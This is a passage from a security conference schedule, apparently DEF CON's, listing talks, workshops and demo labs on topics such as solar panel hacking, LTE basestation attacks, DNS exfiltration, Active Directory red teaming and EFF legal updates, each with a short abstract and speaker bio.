Fadli B. Sidek is currently a cyber threat intel analyst for Control Risks. He has been in the IT and security industry for almost 10 years and is still loving it. In the past, he was a security consultant doing VAPT for companies in the AMEA region. He has spoken in several security conferences such as BSidesLV, DefCamp, Null Singapore, BSidesVienna and Hackers Conferences in India. He loves reading about security and most importantly traveling the world to attend conferences and share his knowledge and learn from others. Not a guru nor an expert, simply a security over-enthusiast.
Description: In the last couple of years, the number of cases of people being scammed online has risen gradually, and as the number of people become increasingly connected to the online world, so are the number of scammers. Scam cases, from online dating scams, winning lottery scams, free credit card scams, and of course the Nigerian prince who wants to send millions of dollars to your bank account scams are some of those that have been hitting innocent victims the most. Although many such reported cases are published online and on paper, many are still falling victims to such malicious incidents. Recent news by Channel News Asia reported that Singaporeans have been the main target of online scams and GET REAL even published a documentary about the victims of cyber/online scams.
According to the Singapore Police Force (SPF), there were 16,575 crime cases recorded in the first six months of 2015, an increase of 6.7 per cent over the same period of 2014. In the latest report by the SPF, a total of 33,608 cases were recorded last year, up from 32,315 cases in 2014. Online commercial crimes rose by 95 per cent to 3,759 cases, up from 1,929 cases in 2014 which made Singapore’s crime up to 4% driven mostly by cybercrime.
Return to Index
DEFCON - Track Two - Saturday - 16:30-16:59
All Your Solar Panels are Belong to Me
Fred Bret-Mounet Hacker
I got myself a new toy: A solar array... With it, a little device by a top tier manufacturer that manages its performance and reports SLAs to the cloud. After spending a little time describing why it tickled me pink, I'll walk you through my research and yes, root is involved! Armed with the results of this pen test, we will cover the vendor's reaction to the bee sting: ostrich strategy, denial, panic, shooting the messenger and more. Finally, not because I know you get it, but because the rest of the world doesn't, we'll cover the actual threats associated with something bound to become part of our critical infrastructure. Yes, in this Shodan world, one could turn off a 1.3MW solar array but is that as valuable as using that device to infiltrate a celebrity's home network?
Fred Bret-Mounet's descent into the underworld of security began as a pen tester at @stake. Now, he leads a dual life--info sec leader by day, rogue hacker by night. His life in the shadows and endless curiosity has led to surprising home automation hacks, playing with Particle Photons and trying to emulate Charlie & Chris' car hacking on his I3.
Twitter: @fbret
Return to Index
DEFCON - Track Two - Sunday - 14:00-14:59
An Introduction to Pinworm: Man in the Middle for your Metadata
bigezy Hacker
saci Hacker
What is the root cause of memory and network traffic bloat? Our current research using tools we previously released Badger at Black Hat in 2014 and the Kobra released at BsidesLV 2015 shows a 40 percent increase in outside unique IP traffic destinations and a 400 percent increase in data transmitted towards these destinations. But through the course of the research we found currently used IRP monitoring tools were lacking to help produce enough information to forensically investigate the exfiltration of user metadata. Pinworm is a sniffer that shows all created IRPs created in the kernel in I/O devices. The IRPs are correlated with the processes that created them and the called driver stack. With network traffic data we are off to the races. Using pinworm which we released this week, we will show forensic case studies from cradle to grave of what happens when you do things online in social media sites.
Like all of our previously released tools, Pinworm is a framework including server side code you can use to collect and display user metadata inline in browser frames. Does this metadata collection happen in the browser, in userland, or in the kernel? Come to our talk and find out. We will demonstrate the collection of user metadata and collecting this information in a live browser session. Then we will show you how to intercept your personal data before it leaves your computer keeping your privacy, well, private. BYOTFH (Bring your own tin foil hat).
bigezy has spent his career defending critical infrastructure hacking it from the inside to keep things from blowing up. Bigezy got his black badge from DEF CON in 2003. Bigezy currently works as a cyber security researcher at a place where these things are done. During the last 25 years, Bigezy has worked at fortune 500 companies in the electric sector, financial sector, and telecom. He has spoke at numerous conferences worldwide including bsidesLV and the DEF CON Crypto and Privacy village last year. Bigezy is also the president of Hackito Ergo Sum in Paris France. @bigezy_ When you are a one legged boogeyman slash system internals hacker, every kick is a flying kick.
Twitter: @bigezy
saci takes pride in his disdain for hypocrisy. We are sure you have seen him around in the usual places, and maybe you think you know who he is. But, you will never quite know who he is until you come to the talk.
Twitter: @itsasstime
Return to Index
HHV - Contest Area - Saturday - 12:00-12:59
An Introduction To Pulling Software From Flash via I2C, SPI and JTAG
Matt DuHarte
This beginners talk is as jargon free as possible and a great introduction to the world inside all those little devices that make up our world. Not every device we have makes it easy to see the software they run. How do you analyze the firmware of a device that does not have a display or even a serial port? Simple - pull the software directly from the flash on the device. A new generation of simple and inexpensive hardware devices make it fast and easy. This talk will introduce just enough of the protocols involved, the devices used to pull a firmware image and the software we use to modify the images and put them back.
Matt will also be hosting a breakout session with demonstrations and Q&A immediately after the talk in the HHV.
Return to Index
Workshops - Las Vegas Ballroom 3 - Friday - 14:00-18:00
Analyzing Internet Attacks with Honeypots
Ioannis Koniaris Security Engineer
In the field of computer security, honeypots are systems aimed at deceiving malicious users or software that launch attacks against the servers and network infrastructure of various organizations. They can be deployed as protection mechanisms for an organization’s real systems, or as research units to study and analyze the methods employed by human hackers or malware. In this workshop we will outline the operation of two research honeypots, by manual deployment and testing in real time. A honeypot system will undertake the role of a web trap for attackers who target the SSH service in order to gain illegal server access. Another one will undertake the role of a malware collector, usually deployed by malware analysts and anti-virus companies to gather and securely store malicious binary samples. We will also talk about post-capturing activities and further analysis techniques. As an example, we will see how to index all the captured information in a search engine like Elasticsearch and then utilize ElastAlert, an easy to use framework to setup meaningful alerting. Lastly, visualization tools will be presented for the aforementioned systems, plus a honeypot bundle Linux distribution that contains pre-configured versions of the above tools and much more related utilities, which can make the deployment of honeypots in small or large networks an easy task.
Ioannis is an Information Security engineer and researcher, working to protect company assets, data and operations. His general interests are programming, security, development operations (DevOps) and cloud computing while his academic interests include honeypots, honeyclients, botnet tracking, malware analysis, intrusion detection and security visualization. Ioannis has released a number of utilities to aid information security professionals using honeypots. Some of them are Kippo-Graph, Honeyd-Viz and HoneyDrive; a self-contained honeypot bundle Linux distribution. These tools are used by numerous university researchers, various CERT teams worldwide and have also been included in the “Proactive detection of security incidents II – Honeypots” report by ENISA (European Union Agency for Network and Information Security).
Max Class Size: 55
Prerequisites for students: Setup of VirtualBox for their OS
Materials or Equipment students will need to bring to participate: Only their laptops.
Return to Index
Demolabs - Table 1 - Saturday - 12:00-13:50
Addroid-InsecureBank
Dinesh Shetty
This is a major update to one of my previous projects - "InsecureBank". This vulnerable Android application is named "InsecureBankv2" and is made for security enthusiasts and developers to learn the Android insecurities by testing this vulnerable application. Its back-end server component is written in python. The client component i.e. the Android InsecureBank.apk can be downloaded along with the source.
Dinesh leads the Mobile Security Testing Center of Excellence at Security Innovation. He has performed innumerable penetration tests on Web, Mobile and VoIP technologies - however his core area of expertise is Mobile and Embedded application pentesting and exploitation. He is an accomplished author and speaker, and his research has been published in multiple security zines and sites like Packet Storm, Exploit-DB, PenTest Magazine, SecurityXploded, ClubHACK Magazine, and Exploit-Id amongst others
Return to Index
DEFCON - DEF CON 101 - Friday - 14:00-14:59
Anti-Forensics AF
int0x80 (of Dual Core), Hacker
This presentation is the screaming goat anti-forensics version of those ‘Stupid Pet Tricks’ segments on late night US talk shows. Nothing ground-breaking here, but we'll cover new (possibly) and trolly (definitely) techniques that forensic investigators haven't considered or encountered. Intended targets cover a variety of OS platforms.
int0x80 is the rapper in Dual Core. Drink all the booze, hack all the things!
Twitter: @dualcoremusic
DualCoreMusic on Facebook
Return to Index
Workshops - Las Vegas Ballroom 7 - Saturday - 10:00-14:00
Applied Physical Attacks on Embedded Systems, Introductory Version
Joe FitzPatrick Instructor & Researcher, SecuringHardware
This workshop introduces several different relatively accessible interfaces on embedded systems. Attendees will get hands-on experience with UART, SPI, and JTAG interfaces on a MIPS-based wifi router. After a brief architectural overview of each interface, hands-on labs will guide through the process understanding, observing, interacting with, and exploiting the interface to potentially access a root shell on the target.
Joe (@securelyfitz) is an Instructor and Researcher at https://SecuringHardware.com. Joe has spent over a decade working on low-level silicon debug, security validation, and penetration testing of CPUS, SOCs, and microcontrollers. He has spend the past 5 years developing and leading hardware security related training, instructing hundreds of security researchers, pen testers, hardware validators worldwide. When not teaching Applied Physical Attacks on x86 or Embedded Systems, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects, which he regularly presents at all sorts of fun conferences.
Max Class Size: 48
Prerequisites for students: No hardware or electrical background is required. Computer architecture knowledge, Linux command-line familiarity, and low-level programming experience helpful but not required.
Materials or Equipment students will need to bring to participate: All equipment, including laptops, will be provided for use in the class. Students will be provided with a lab manual that includes an equipment list of all materials used for the class.
Return to Index
SkyTalks - Skyview 3 - Saturday - 12:00-12:59
Art of Espionage (v.303) - Pyr0, Lizzie Borden
No description available
Return to Index
CPV - Bronze 2 - Saturday - 15:00-16:00
Talk Title:
Ask the EFF: The Year in Digital Civil Liberties
Speaker Name, Employer or position:
Kurt Opsahl, Nate Cardozo, Andrew Crocker, Dr. Jeremy Giliula, Eva Galperin, Katitza Rodriguez - EFF
Abstract:
Get the latest information about how the law is racing to catch up with technological change from staffers at the Electronic Frontier Foundation, the nations premiere digital civil liberties group fighting for freedom and privacy in the computer age. This session will include updates on current EFF issues such as surveillance online, encryption (and backdoors), and fighting efforts to use intellectual property claims to shut down free speech and halt innovation, discussion of our technology project to protect privacy and speech online, updates on cases and legislation affecting security research, and much more. Half the session will be given over to question-and-answer, so it's your chance to ask EFF questions about the law and technology issues that are important to you.
Bio:
KURT OPSAHL is the Deputy Executive Director and General Counsel of the Electronic Frontier Foundation. In addition to representing clients on civil liberties, free speech and privacy law, Opsahl counsels on EFF projects and initiatives. Opsahl is the lead attorney on the Coders' Rights Project. Before joining EFF, Opsahl worked at Perkins Coie, where he represented technology clients with respect to intellectual property, privacy, defamation, and other online liability matters, including working on Kelly v. Arribasoft, MGM v. Grokster and CoStar v. LoopNet. For his work responding to government subpoenas, Opsahl is proud to have been called a "rabid dog" by the Department of Justice. Prior to Perkins, Opsahl was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of Information Management & Systems. Opsahl received his law degree from Boalt Hall, and undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic Media and Privacy Law Handbook." In 2007, Opsahl was named as one of the "Attorneys of the Year" by California Lawyer magazine for his work on the O'Grady v. Superior Court appeal. In 2014, Opsahl was elected to the USENIX Board of Directors.
NATE CARDOZO is a Senior Staff Attorney on the Electronic Frontier Foundations digital civil liberties team. In addition to his focus on free speech and privacy litigation, Nate works on EFF's Who Has Your Back? report and Coders' Rights Project. Nate has projects involving cryptography and the law, automotive privacy, government transparency, hardware hacking rights, anonymous speech, electronic privacy law reform, Freedom of Information Act litigation, and resisting the expansion of the surveillance state. A 2009-2010 EFF Open Government Legal Fellow, Nate spent two years in private practice before returning to his senses and to EFF in 2012. Nate has a B.A. in Anthropology and Politics from U.C. Santa Cruz and a J.D. from U.C. Hastings where he has taught first-year legal writing and moot court. He brews his own beer, has been to India four times, and watches too much Bollywood.
ANDREW CROCKER is a staff attorney on the Electronic Frontier Foundations civil liberties team. He focuses on EFFs national security and privacy docket, as well as the Coders' Rights Project. While in law school, Andrew worked at the Berkman Center for Internet and Society, the American Civil Liberties Unions Speech, Privacy, and Technology Project, and the Center for Democracy and Technology. He received his undergraduate and law degrees from Harvard University and an M.F.A. in creative writing from New York University. His interests include Boggle and donuts.
DR. JEREMY GILIULA is a Staff Technologist at the Electronic Frontier Foundation where he focuses on a wide variety of tech policy topics including net neutrality, big data, mobile privacy, and privacy issues associated with drones and autonomous vehicles. At a young age Jeremy was sidetracked from his ultimate goal of protecting digital civil liberties by the allure of building and programming robots. He went to Caltech for undergrad, where he spent four years participating in the DARPA Grand Challenge, a competition to create a vehicle capable of traversing the desert autonomously. He then got his PhD in computer science from Stanford University, where his research focused on the design and analysis of algorithms for guaranteeing the safety of systems that employ machine learning and other AI techniques in an online fashion.
EVA GALPERIN is EFFs Global Policy Analyst, and has been instrumental in highlighting government malware designed to spy upon activists around the world. A lifelong geek, Eva misspent her youth working as a Systems Administrator all over Silicon Valley. Since then, she has seen the error of her ways and earned degrees in Political Science and International Relations from SFSU. She comes to EFF from the US-China Policy Institute, where she researched Chinese energy policy, helped to organize conferences, and attempted to make use of her rudimentary Mandarin skills.
KATITZA RODRIGUEZ is EFF's international rights director. She concentrates on comparative policy of international privacy issues, with special emphasis on law enforcement, government surveillance, and cross border data flows. Her work in EFF's International Program also focuses on cybersecurity at the intersection of human rights. Katitza also manages EFF's growing Latin American programs. She is an advisor to the UN Internet Governance Forum (2009-2010), and a member of the Advisory Board of Privacy International. Before joining EFF, Katitza was director of the international privacy program at the Electronic Privacy Information Center in Washington D.C., where amongst other things, she worked on The Privacy and Human Rights Report, an international survey of privacy law and developments. Katitza is well known to many in global civil society and in international policy venues for her work at the U.N. Internet Governance Forum and her pivotal role in the creation and ongoing success of the Civil Society Information Society Advisory Council at the Organisation for Economic Co-operation and Development, for which she served as the civil society liaison while at EPIC from 2008 to March 2010. Katitza holds a Bachelor of Law degree from the University of Lima, Peru. Katitza's twitter handle is @txitua.
Social media links if provided:
@EFF
Return to Index
DEFCON - Track Three - Saturday - 16:30-16:59
Ask the EFF
Kurt Opsahl Deputy Executive Director, General Counsel, EFF
Nate Cardozo Senior Staff Attorney, EFF
Andrew Crocker Staff attorney, EFF
Dr. Jeremy Giliula Staff Technologist, EFF
Eva Galperin GlobalPolicy Analyst, EFF
Katitza Rodriguez International rights director, EFF
Get the latest information about how the law is racing to catch up with technological change from staffers at the Electronic Frontier Foundation, the nation’s premiere digital civil liberties group fighting for freedom and privacy in the computer age. This session will include updates on current EFF issues such as surveillance online, encryption (and backdoors), and fighting efforts to use intellectual property claims to shut down free speech and halt innovation, discussion of our technology project to protect privacy and speech online, updates on cases and legislation affecting security research, and much more. Half the session will be given over to question-and-answer, so it's your chance to ask EFF questions about the law and technology issues that are important to you.
KURT OPSAHL is the Deputy Executive Director and General Counsel of the Electronic Frontier Foundation. In addition to representing clients on civil liberties, free speech and privacy law, Opsahl counsels on EFF projects and initiatives. Opsahl is the lead attorney on the Coders' Rights Project. Before joining EFF, Opsahl worked at Perkins Coie, where he represented technology clients with respect to intellectual property, privacy, defamation, and other online liability matters, including working on Kelly v. Arribasoft, MGM v. Grokster and CoStar v. LoopNet. For his work responding to government subpoenas, Opsahl is proud to have been called a "rabid dog" by the Department of Justice. Prior to Perkins, Opsahl was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of Information Management & Systems. Opsahl received his law degree from Boalt Hall, and undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic Media and Privacy Law Handbook." In 2007, Opsahl was named as one of the "Attorneys of the Year" by California Lawyer magazine for his work on the O'Grady v. Superior Court appeal. In 2014, Opsahl was elected to the USENIX Board of Directors.
NATE CARDOZO is a Senior Staff Attorney on the Electronic Frontier Foundation’s digital civil liberties team. In addition to his focus on free speech and privacy litigation, Nate works on EFF's Who Has Your Back? report and Coders' Rights Project. Nate has projects involving cryptography and the law, automotive privacy, government transparency, hardware hacking rights, anonymous speech, electronic privacy law reform, Freedom of Information Act litigation, and resisting the expansion of the surveillance state. A 2009-2010 EFF Open Government Legal Fellow, Nate spent two years in private practice before returning to his senses and to EFF in 2012. Nate has a B.A. in Anthropology and Politics from U.C. Santa Cruz and a J.D. from U.C. Hastings where he has taught first-year legal writing and moot court. He brews his own beer, has been to India four times, and watches too much Bollywood.
ANDREW CROCKER is a staff attorney on the Electronic Frontier Foundation’s civil liberties team. He focuses on EFF’s national security and privacy docket, as well as the Coders' Rights Project. While in law school, Andrew worked at the Berkman Center for Internet and Society, the American Civil Liberties Union’s Speech, Privacy, and Technology Project, and the Center for Democracy and Technology. He received his undergraduate and law degrees from Harvard University and an M.F.A. in creative writing from New York University. His interests include Boggle and donuts.
DR. JEREMY GILIULA is a Staff Technologist at the Electronic Frontier Foundation where he focuses on a wide variety of tech policy topics including net neutrality, big data, mobile privacy, and privacy issues associated with drones and autonomous vehicles. At a young age Jeremy was sidetracked from his ultimate goal of protecting digital civil liberties by the allure of building and programming robots. He went to Caltech for undergrad, where he spent four years participating in the DARPA Grand Challenge, a competition to create a vehicle capable of traversing the desert autonomously. He then got his PhD in computer science from Stanford University, where his research focused on the design and analysis of algorithms for guaranteeing the safety of systems that employ machine learning and other AI techniques in an online fashion.
EVA GALPERIN is EFFs Global Policy Analyst, and has been instrumental in highlighting government malware designed to spy upon activists around the world. A lifelong geek, Eva misspent her youth working as a Systems Administrator all over Silicon Valley. Since then, she has seen the error of her ways and earned degrees in Political Science and International Relations from SFSU. She comes to EFF from the US-China Policy Institute, where she researched Chinese energy policy, helped to organize conferences, and attempted to make use of her rudimentary Mandarin skills.
KATITZA RODRIGUEZ is EFF's international rights director. She concentrates on comparative policy of international privacy issues, with special emphasis on law enforcement, government surveillance, and cross border data flows. Her work in EFF's International Program also focuses on cybersecurity at the intersection of human rights. Katitza also manages EFF's growing Latin American programs. She is an advisor to the UN Internet Governance Forum (2009-2010), and a member of the Advisory Board of Privacy International. Before joining EFF, Katitza was director of the international privacy program at the Electronic Privacy Information Center in Washington D.C., where amongst other things, she worked on The Privacy and Human Rights Report, an international survey of privacy law and developments. Katitza is well known to many in global civil society and in international policy venues for her work at the U.N. Internet Governance Forum and her pivotal role in the creation and ongoing success of the Civil Society Information Society Advisory Council at the Organisation for Economic Co-operation and Development, for which she served as the civil society liaison while at EPIC from 2008 to March 2010. Katitza holds a Bachelor of Law degree from the University of Lima, Peru. Katitza's twitter handle is @txitua.
Return to Index
DEFCON - Track One - Sunday - 12:00-12:59
Attacking BaseStations - an Odyssey through a Telco's Network
Henrik Schmidt,
IT Security Researcher, ERNW GmbH
Brian Butterly
T Security Researcher, ERNW GmbH
As introduced in our former series of talks ‘LTE vs. Darwin‘ there are quite a few of holes in the LTE specs. Now, having our own Macro BaseStation (an eNodeB) on the desk, we will demonstrate practical approaches to and attacks on real life devices. More and more devices are using mobile radio networks such as GSM, UMTS and LTE and there has already been quite a bit of research on (in)securities on the radio part, but only few people have had a look behind the scenes. Luckily, we had the chance to have just this look and now we would like to raise the curtain for the community. Initially we will quickly cover our complete odyssey from starting up an eNodeB for the first time, checking out the available interfaces and emulating the core network through to starting attacks. In the main part of the talk we will give a rather practical insight into the (in-)security features of basestations. We will start with valid backend connections and how these connections can be abused to reconfigure both a single eNodeB and a complete subnet on a telco network. We will then continue with the ‘official’ maintenance approach with the vendor's tools and webinterfaces giving an attacker both local and remote access to the device. All in all the talk will cover general and specific vulnerabilities in both basestations and the backend network.
Hendrik Schmidt and Brian Butterly are seasoned security researchers with vast experiences in large and complex enterprise networks. Over the years they focused on evaluating and reviewing all kinds of network protocols and applications. They love to play with packets and use them for their own purposes. In this context they learned how to play around with telecommunication networks, wrote protocol fuzzers and spoofers for testing their implementation and security architecture. Both are pentesters and consultants at the German based ERNW GmbH and will happily share their knowledge with the audience.
Return to Index
BHV - Skyview 4 - Saturday - 11:00-11:59
Speaker: Michael Hudson
chap.cl
About Michael Hudson:
Michael Hudson is the founder of CHAP Security, which currently is the Executive Director of the Company. He is also CEO of INTROEXON Ltda, a Company that Develops Software for Medical platforms, doing research and development in Information Security, protection of patient data and medical charts (HCE). With over 10 years dedicated to computer security he specializes in the analysis of malware and Vulnerability Research. His experience also includes Host Intrusion Detection Systems (HIDS) and over 6 years of experience in international security consulting the Government, the military and individuals. Special Thanks to all the Team of Hospital Bernardino Rivadavia (Capital Federal, Argentina). Thanks to all the Emergency Medical Team on Saturdays, my Dear Dra. Noemi Garro, the Hospital Dr. Juan A. Fernandez and my entire Development Team. Thanks to the unwavering support of his Girlfriend and life partner Ingrid.
Abstract:
Today health tends to technologize their skills in an incredible way, but there is a problem ... A who contract for the entire architecture of networks, servers, iCloud, are not experts in information security, thus reaches the day in which a doctor asks where my patient is?
This talk will demonstrate how easy it can be to get patient data, change your medical records, delete them from the system, etc. And all thanks to poor development policies that infringe Big Companies engaged in the development of medical platforms.
Return to Index
DEFCON - DEF CON 101 - Saturday - 12:00-12:59
Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5
Luke Young Information Security Engineer, Hydrant Labs LLC
As bandwidth, computing power, and software advancements have improved over the years, we've begun to see larger and larger DDoS attacks against organizations. Often times these attacks employ techniques such as DNS Amplification to take advantage of servers with very large uplinks. This talk explores a similar technique targeting commonly used throughput testing software typically running on very large uplinks. We will explore the process of attacking this software, eventually compromising it and gaining root access. Then we'll explore some of these servers in the real world determining the size of their uplinks and calculating the total available bandwidth at our fingertips all from a $5 VPS. We will finish up the presentation with a live demo exploiting an instance and launching a DoS.
Luke Young is a security researcher from the frozen plains of Minnesota who has spent his last three summers escaping to the much warmer Bay Area as a security intern for various tech companies, most recently as part of the Uber product security team. He presented at DEF CON 23 on the topic of exploiting bitflips in memory and has investigated a variety of well-known products and network protocols resulting in numerous CVE assignments and recognition in security Hall of Fames. He is currently attempting to balance earning his undergraduate degree with maintaining his position as one of the top 10 researchers on Bugcrowd.
Return to Index
WOS - Skyview 6 - Saturday - 14:10-14:59
Attacks on Enterprise Social Media
Mike Raggo, Chief Research Scientist at ZeroFOX
Current threat vectors show targeted attacks on social media accounts owned by enterprises and their employees. Most organizations lack a defense-in-depth strategy to address the evolving social media threat landscape. The attacks are outside their network, commonly occur through their employee's personal accounts, and circumvent existing detection technologies. In this presentation we'll explore the taxonomy of social media impersonation attacks, phishing scams, information leakage, espionage, and more. We'll then provide a method to categorize these threats and develop a methodology to adapting existing incident response processes to encompass social media threats for your organization.
Michael T. Raggo (Twitter: @MikeRaggo) has over 20 years of security research experience. Michael is the author of “Mobile Data Loss: Threats & Countermeasures" and “Data Hiding: Exposing Concealed Data in Multimedia, Operating Systems, Mobile Devices and Network Protocols" for Syngress Books, and contributing author for “Information Security the Complete Reference 2nd Edition". A former security trainer, Michael has briefed international defense agencies including the FBI and Pentagon, is a participating member of FSISAC/BITS, and is a frequent presenter at security conferences, including Black Hat, DEF CON, Gartner, RSA, DoD Cyber Crime, OWASP, HackCon, and SANS.
Return to Index
BHV - Skyview 4 - Sunday - 13:00-13:59
Speaker: Michael Zaytsev
@HighNY_
meetup.com/HighNY
linkedin.com/in/michaelzaytsev
About Michael Zaytsev:
Immigrant raised in Brooklyn, NY. Worked in corporate America. Now I'm a life coach and Cannabis community organizer.
Cannabis is a powerful technology and it has not been hacked nearly enough. Mostly because for a long time it's been illegal to do so in meaningful ways. Industrial hemp can be used for over 20,000 purposes, yet there are significant challenges to process it. Cannabis medicine has effectively treated dozens of ailments, yet precise dosing and predictable effects have yet to be developed. Legalization is creating a number of policy questions, how do we police impaired driving? How do we make sure the powers that be don't create a new system that is racially biased and completely unjust?
Return to Index
DEFCON - DEF CON 101 - Sunday - 15:00-15:59
Auditing 6LoWPAN Networks using Standard Penetration Testing Tools
Jonathan-Christofer Demay Airbus Defence and Space
Adam Reziouk
Arnaud Lebrun
The Internet of Things is expected to be involved in the near future in all major aspects of our modern society. On that front, we argue that 6LoWPAN is a protocol that will be a dominant player as it is the only IoT-capable protocol that brings a full IP stack to the smallest devices. As evidence of this, we can highlight the fact that even the latest ZigBee Smart Energy standard is based on ZigBee IP which itself relies on 6LoWPAN, a competitor of the initial ZigBee protocol. Efficient IP-based penetration testing tools have been available to security auditors for years now. However, it is not that easy to use them in the context of a 6LoWPAN network since you need to be able to join it first. In fact, the difficult part is to associate with the underlying IEEE 802.15.4 infrastructure.
Indeed, this standard already has two iterations since its release in 2003 and it provides with several possibilities regarding network topology, data transfer model and security suite. Unfortunately, there is no off-the-shelf component that provides, out of the box, with such a wide range of capabilities. Worst still, some of them deviate from the standard and can only communicate with components from the same manufacturer. In this paper, we present the ARSEN project: Advanced Routing for 6LoWPAN and Ethernet Networks. It provides security auditors with two new tools.
First, a radio scanner capable of identifying IEEE 802.15.4 infrastructures and for each one of them their specificities, including several deviations from the standard that we encountered in actual security audits.
Secondly, a border router capable of routing IPv6 datagrams between Ethernet and 6LoWPAN networks while adapting to the specificities identified by the scanner. As a result, the combination of both effectively allows security auditors to use available IP-based penetration testing tools on different 6LoWPAN networks.
Jonathan-Christofer Demay, PhD is the current penetration testing team leader at AIRBUS Defence and Space. As a former academic researcher, he has been working on IDS bypassing, intrusion detection and general network security. Now a consultant for various key industries and government bodies, he is working on incident response, penetration testing and social engineering.
Adam Reziouk is an electronics and automation engineer currently working on wireless communications and industrial network security at AIRBUS Defence and Space. He holds a master's degree in electrical and electronic engineering and has been conducting vulnerability research activities on programmable logic controllers, connected devices and smart grids.
Arnaud Lebrun is a command and control engineer currently working at AIRBUS Defence and Space. He is focusing on security issues for several projects in the aerospace industry and related areas such as radioactive waste disposal facilities or large telescopes. He also supports the penetration testing team for perimeters that include ICS infrastructures or embedded electronics.
Return to Index
SkyTalks - Skyview 3 - Friday - 10:00-10:59
Speakers: Nolan Berry, Towne Besel
Talk: Automated DNS Data Exfiltration and Mitigation
Exploiting the trust people place in port 53 to exfiltrate data from a compromised network. How to do it, how to detect it on your network and how to mitigate it.
Return to Index
WOS - Skyview 6 - Friday - 16:10-16:59
Automated Dorking for Fun and Profit^WSalary
Filip Reesalu, Security Researcher at Recorded Future
A dork is a specialized search engine query which reveals unintentional data leaks and vulnerable server configurations. In order to catalogue vulnerable hosts with minimal manual intervention we're now introducing an open-source framework for grabbing newly published dorks from various sources and continuously executing them in order to establish a database of exposed hosts. A similar project (SearchDiggity, closed source, Windows only) had its latest release in 2013 and the latest blog post was published in 2014.
Filip Reesalu (Twitter: @p1dgeon) is a Security Researcher at Recorded Future. He joined the Threat Intelligence team after switching over from a data scientist role and is now responsible for analyzing malware samples and traffic as well as creating tools that benefit the community at large.
Return to Index
Demolabs - Table 4 - Saturday - 12:00-13:50
Automated Penetration Tooklit (APT2)
Adam Compton
Nearly every penetration test begins the same way; run a NMAP scan, review the results, choose interesting services to enumerate and attack, and perform post-exploitation activities. What was once a fairly time consuming manual process, is now automated!
Automated Penetration Testing Toolkit (APT2) is an extendable modular framework designed to automate common tasks performed during penetration testing. APT2 can chain data gathered from different modules together to build dynamic attack paths. Starting with a NMAP scan of the target environment, discovered ports and services become triggers for the various modules which in turn can fire additional triggers. Have FTP, Telnet, or SSH? APT2 will attempt common authentication. Have SMB? APT2 determines what OS and looks for shares and other information. Modules include everything from enumeration, scanning, brute forcing, and even integration with Metasploit. Come check out how APT2 will save you time on every engagement.
Adam Compton has been a programmer, researcher, professional pentester, and farmer. Adam has over 15 years of programming, network security, incident response, security assessment, and penetration testing experience. Throughout Adam's career, he has worked for both federal and international government agencies as well as within various aspects of the private sector.
Return to Index
CPV - Bronze 2 - Sunday - 12:30-13:00
Talk Title:
Backdooring Cryptocurrencies: The Underhanded Crypto Contest Winners
Speaker Name, Employer or position:
Taylor Hornby, Adam Caudill
Abstract:
The Underhanded Crypto Contest is an annual competition that brings out the best ways of subtly inserting weaknesses into cryptography protocols and software. By understanding how adversarially-crafted weaknesses go unnoticed, we get better at discovering these errors in our designs and code. In this talk we present the technical details of the best one or two contest entries.
Bio:
Taylor is known for his carefully-written security tools, including a side-channel-free password generator and a cryptography library for PHP. He regularly contributes to a number of open source projects by security auditing and reviewing source code. As a recent graduate of the University of Calgary, his research is focused on exploit defense mechanisms and side-channel attacks. In his spare time, he enjoys studying physics from a computer science perspective and is an organizer of the Underhanded Crypto Contest.
Adam Caudill is a security consultant with over 15 years of experience in security and software development; with a focus on application security, secure communications, and cryptography. Active blogger, open source contributor, and advocate for user privacy and protection. His work has been cited by many media outlets and publications around the world, from CNN to Wired and countless others.
Social media links if provided:
@UnderCrypto
Return to Index
DEFCON - Track Three - Sunday - 13:00-13:59
Backdooring the Frontdoor
Jmaxxz Hacker
As our homes become smarter and more connected we come up with new ways of reasoning about our privacy and security. Vendors promise security, but provide little technical information to back up their claims. Further complicating the matter, many of these devices are closed systems which can be difficult to assess. This talk will explore the validity of claims made by one smart lock manufacturer about the security of their product. The entire solution will be deconstructed and examined all the way from web services to the lock itself. By exploiting multiple vulnerabilities Jmaxxz will demonstrate not only how to backdoor a front door, but also how to utilize these same techniques to protect your privacy.
Jmaxxz works as a software engineer for a Fortune 100 company, and is a security researcher for pleasure. His FlashHacker program was featured in Lifehacker's most popular free downloads of 2010. More recently he has contributed to the node_pcap project which allows interfacing with libpcap from node. His other interests include lock picking and taking things apart.
Twitter: @jmaxxz
Return to Index
DEFCON - DEF CON 101 - Thursday - 12:00-12:59
Beyond the MCSE: Red Teaming Active Directory
Sean Metcalf Founder & Security Principal, Trimarc
Active Directory (AD) is leveraged by 95% of the Fortune 1000 companies for its directory, authentication, and management capabilities, so why do red teams barely scratch the surface when it comes to leveraging the data it contains? This talk skips over the standard intro to Active Directory fluff and dives right into the compelling offensive information useful to a Red Teamer, such as quickly identifying target systems and accounts. AD can yield a wealth of information if you know the right questions to ask. This presentation ventures into areas many didn't know existed and leverages capability to quietly identify interesting accounts & systems, identify organizations the target company does business with regularly, build target lists without making a sound, abuse misconfigurations/existing trusts, and quickly discover the most interesting shares and their location. PowerShell examples and AD defense evasion techniques are provided throughout the talk.
Let's go beyond the MCSE and take a different perspective on the standard AD recon and attack tactics.
Sean Metcalf is founder and principal security consultant at Trimarc (www.TrimarcSecurity.com), an information security consulting firm focused on improving enterprise security. He is one of about 100 people in the world who holds the Microsoft Certified Master Directory Services (MCM) certification, is a Microsoft MVP, and has presented on Active Directory attack and defense at BSides, Shakacon, Black Hat, DEF CON , and DerbyCon security conferences. Sean has provided Active Directory and security expertise to government, corporate, and educational entities since Active Directory was released. He currently provides security consulting services to customers and regularly posts interesting Active Directory security information on his blog, ADSecurity.org.
Twitter: @PyroTek3
Return to Index
BHV - Skyview 4 - Saturday - 11:00-11:59
Speaker: Jeffrey Tibbetts
About Jeffrey:
